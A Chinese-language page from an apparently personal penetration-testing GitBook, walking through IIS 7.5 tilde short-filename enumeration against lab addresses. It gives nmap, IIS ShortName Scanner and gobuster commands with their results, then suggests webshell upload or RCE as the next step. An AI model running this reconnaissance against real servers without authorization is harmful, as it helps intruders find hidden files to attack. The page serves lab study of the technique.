0xdfxyz
  • Penetration Testing Process
    • README.md
    • Whois
  • Nikto
  • Search Engine Discovery
  • FinalRecon
  • Nessus
  • 0_新手上路
    • 0_新手上路
  • 1_訊息收集
    • 服務枚舉
      • Page 6
      • Nmap
      • DNS
    • 應用枚舉
      • Page 6
    • A D枚舉
      • Page 6
    • web枚舉
      • Page 6
      • Web Fuzzing
      • Subdomain
  • 2_漏洞前準備
    • 反彈 Shell
    • 工具彙總
    • 字典生成
  • 3_漏洞利用
    • 應用漏洞利用
    • AD 攻擊
    • 二進位漏洞利用
    • Web漏洞利用
      • XSS
      • IDOR
      • Webshel​​l
      • File uploads
      • SSTI
      • LFI
      • SQL injection
      • XXE
      • HTTP Verb Tampering
      • Command Injection
    • 服務漏洞利用
      • CMS
        • Wordpress
        • Joolmla
        • Drupal
      • Servlet 容器/軟體開發
        • Jenkins
        • Tomcat
      • 基礎設施/網路監控工具
        • Splunk
        • PRTG Network Monitor
      • 客戶服務管理與配置管理
        • osTicket
        • Gitlab
      • 通用網關介面
        • 攻擊通用網關介面 (CGI) 應用程式 - Shellshock
      • 其他應用
        • ColdFusion
        • IIS Tilde
        • LDAP
      • 常見應用程式
        • Thick client(也稱為rich客戶端或fat客戶端
        • Web 批量分配漏洞 ( Ruby on Rails)
        • 攻擊連接到服務的應用程式(SSH)
  • 4_滲透
    • Linux 權限提升
    • Windows 權限提升
    • Windows + Linux 工具
  • 5_橫向移動
    • 工具
    • 跳板 Pivoting
    • AD 橫向移動
    • Linux 橫向移動
    • Windows 橫向移動
  • 6_NetExec
    • 常見模組
    • 命令執行
    • 漏洞掃描模組
    • 模組使用
    • 憑證轉儲
    • Kerberos 認證
    • LDAP RDP 枚舉
    • SMB 枚舉
由 GitBook 提供支持
在本页
  • 🔍 1. 發現點
  • 🚀 2. 測試Payload
  • 🎯 3. 利用漏洞
  • 🔗 5. 連鎖漏洞

这有帮助吗?

  1. 3_漏洞利用
  2. 服務漏洞利用
  3. 其他應用

IIS Tilde

🔍 1. 發現點

📌 目標

  • Microsoft IIS 7.5

  • 可能存在的漏洞:IIS Tilde Enumeration (8.3 短檔案名稱枚舉漏洞)

🛠 掃描目標

使用 nmap 進行端口掃描,確認 IIS 伺服器版本:

nmap -p- -sV -sC --open 10.129.224.91

發現 IIS 7.5 在 port 80 運行,該版本可能易受 Tilde 枚舉攻擊。


🚀 2. 測試Payload

📂 使用 IIS ShortName Scanner 進行枚舉

java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

掃描結果:

  • 識別目錄: ASPNET~1, UPLOAD~1

  • 識別文件: CSASPX~1.CS, TRANSF~1.ASP

📂 使用 Gobuster 暴力破解完整檔名

🔹 產生字典

egrep -r ^transf /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/list.txt

🔹 使用 Gobuster 嘗試解析完整檔名

gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp

結果:

  • 確認 TRANSF~1.ASP 完整檔名為 transfers.aspx


🎯 3. 利用漏洞

  • 已發現可疑 ASPX 文件

  • 下一步:嘗試上傳 WebShell 或利用已知漏洞進行 RCE


🔗 5. 連鎖漏洞

✅ IIS Tilde 枚舉 → 發現隱藏檔案與目錄 ✅ Gobuster 枚舉 → 解析完整檔案名稱 ✅ 進一步測試該 ASPX 檔案是否可用來上傳 WebShell 或執行 RCE

上一页ColdFusion下一页LDAP

最后更新于2个月前

这有帮助吗?